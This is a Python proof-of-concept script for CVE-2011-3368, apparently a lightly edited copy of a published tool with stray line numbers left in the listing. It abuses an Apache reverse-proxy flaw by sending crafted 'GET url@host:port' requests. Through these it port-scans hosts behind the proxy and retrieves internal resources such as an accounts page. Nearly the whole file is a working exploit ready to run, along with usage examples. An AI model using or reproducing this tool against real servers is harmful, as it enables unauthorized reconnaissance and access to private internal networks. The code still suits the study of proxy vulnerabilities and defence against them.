
apache.py

  1. #!/usr/bin/env python
  2.  
  3. import socket
  4. import string
  5. import getopt, sys
  6.  
  7.  
# Default TCP ports probed when no single port is selected with -e.
# Note that 0 is in the list as written by the author; it is sent to the
# proxy like any other value, so keep it unless the output format changes.
known_ports = [
    0, 21, 22, 23, 25, 53, 69, 80, 110,
    137, 139, 443, 445, 3306, 3389, 5432, 5900, 8080,
]
  9.  
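def send_request(url, apache_target, apache_port, internal_target, internal_port, resource):
    """Send one crafted GET through the Apache reverse proxy and return the raw reply.

    The request line is "GET <url>@<internal_target>:<internal_port>/<resource>"
    with a Host header of apache_target -- the CVE-2011-3368 probe this PoC is
    built around.  All six arguments are strings exactly as parsed from the
    command line; no escaping or validation is applied to them.

    Returns the first chunk (up to 4096 bytes) received from the proxy, or ""
    when the connect, send or receive fails or exceeds the 3 s timeout.
    scan_host() reports "" as a filtered port.

    Raises ValueError if apache_port is not an integer string.  The original
    hid that under a bare except and would then report every port as filtered.
    """
    request = ("GET " + url + "@" + internal_target + ":" + internal_port
               + "/" + resource + " HTTP/1.1\r\n"
               + "Host: " + apache_target + "\r\n\r\n")

    # Convert outside the network try-block so a bad -p value is reported
    # instead of being folded into the "" (filtered) result.
    proxy_port = int(apache_port)

    remoteserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    remoteserver.settimeout(3)
    try:
        remoteserver.connect((apache_target, proxy_port))
        # sendall() retries partial writes; send() may silently write less.
        remoteserver.sendall(request)
        return remoteserver.recv(4096)
    except socket.error:
        # Refused, reset, unreachable, DNS failure or timeout (socket.timeout
        # is a socket.error subclass): same "" the original returned.
        return ""
    finally:
        # The original never closed the socket, leaking one descriptor per probe.
        remoteserver.close()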
  24.  
def get_banner(result):
    """Return the part of a raw HTTP reply that follows the first blank line.

    The header/body separator is the first CRLF CRLF sequence.  When it is
    absent, find() returns -1 and the slice starts at index 3; that quirk of
    the original string.find() version is kept so output is unchanged.
    """
    header_end = result.find("\r\n\r\n")
    return result[header_end + 4:]
  27.  
  28.  
def scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource):
    """Probe every port in tested_ports through the proxy and print one line each.

    A reply whose status line is 200, any 30x, or 502 is reported as open and
    the body from get_banner() is printed after it; an empty reply (connect,
    send or recv failed or timed out in send_request) is reported as filtered;
    any other reply as closed.  Ports may be ints or strings -- each is
    stringified before being placed in the request line.
    """
    # "HTTP/1.1 30" deliberately matches every 30x redirect status.
    open_markers = ("HTTP/1.1 200", "HTTP/1.1 30", "HTTP/1.1 502")

    print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource)
    for port in tested_ports:
        port = str(port)
        result = send_request(url, apache_target, apache_port, internal_target, port, resource)
        if any(marker in result for marker in open_markers):
            print("- Open port: " + port + "/TCP")
            print(get_banner(result))
        elif not result:
            print("- Filtered port: " + port + "/TCP")
        else:
            print("- Closed port: " + port + "/TCP")
  45.  
def usage():
    """Print the help text (tool banner, option list and examples) to stdout."""
    help_lines = [
        "",
        "CVE-2011-3368 proof of concept by Rodrigo Marcos",
        "http://www.secforce.co.uk",
        "",
        "usage():",
        "python apache_scan.py [options]",
        "",
        " [options]",
        "     -r: Remote Apache host",
        "     -p: Remote Apache port (default is 80)",
        "     -u: URL on the remote web server (default is /)",
        "     -d: Host in the DMZ (default is 127.0.0.1)",
        "     -e: Port in the DMZ (enables 'single port scan')",
        "     -g: GET request to the host in the DMZ (default is /)",
        "     -h: Help page",
        "",
        "examples:",
        " - Port scan of the remote host",
        "     python apache_scan.py -r www.example.com -u /images/test.gif",
        " - Port scan of a host in the DMZ",
        "     python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local",
        " - Retrieve a resource from a host in the DMZ",
        "     python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html",
        "",
    ]
    # One print per entry keeps the line-by-line output identical to the
    # original sequence of print statements (an empty entry prints a bare newline).
    for line in help_lines:
        print(line)
  71.  
def print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource):
    """Print the run header: tool name plus the effective scan parameters.

    apache_target, apache_port, internal_target and resource are expected to
    be strings (they are concatenated directly); tested_ports is any object,
    shown via str().  url is accepted for signature symmetry but not printed.
    """
    banner_lines = [
        "",
        "CVE-2011-3368 proof of concept by Rodrigo Marcos",
        "http://www.secforce.co.uk",
        "",
        " [+] Target: " + apache_target,
        " [+] Target port: " + apache_port,
        " [+] Internal host: " + internal_target,
        " [+] Tested ports: " + str(tested_ports),
        " [+] Internal resource: " + resource,
        "",
    ]
    for line in banner_lines:
        print(line)
  83.  
  84.  
def main():
    """Parse the command line into the module-level settings.

    Switches: -u url, -r proxy host, -p proxy port, -d internal host,
    -e internal port, -g resource, -h/--help.  Values are stored, unvalidated,
    in the module globals of the same names; the script body reads them after
    main() returns.  Prints the usage text and exits with status 2 on an
    unknown option, on -h/--help, or when no -r target was supplied.
    """
    global apache_target
    global apache_port
    global url
    global internal_target
    global internal_port
    global resource

    try:
        opts, _args = getopt.getopt(sys.argv[1:], "u:r:p:d:e:g:h", ["help"])
    except getopt.GetoptError:
        usage()
        sys.exit(2)

    # getopt has already validated the switches; nothing in this loop can
    # raise GetoptError, so no second handler is needed around it.
    for opt, value in opts:
        if opt in ("-h", "--help"):
            usage()
            sys.exit(2)
        elif opt == "-u":
            url = value
        elif opt == "-r":
            apache_target = value
        elif opt == "-p":
            apache_port = value
        elif opt == "-d":
            internal_target = value
        elif opt == "-e":
            internal_port = value
        elif opt == "-g":
            resource = value

    if apache_target == "":
        usage()
        sys.exit(2)
  125.  
  126.  
# Defaults for the settings main() fills in from the command line.
url = "/"
apache_target = ""
apache_port = "80"
internal_target = "127.0.0.1"
internal_port = ""
resource = "/"

main()

# -e restricts the run to that single port; otherwise the built-in list is used.
tested_ports = [internal_port] if internal_port != "" else known_ports

scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource)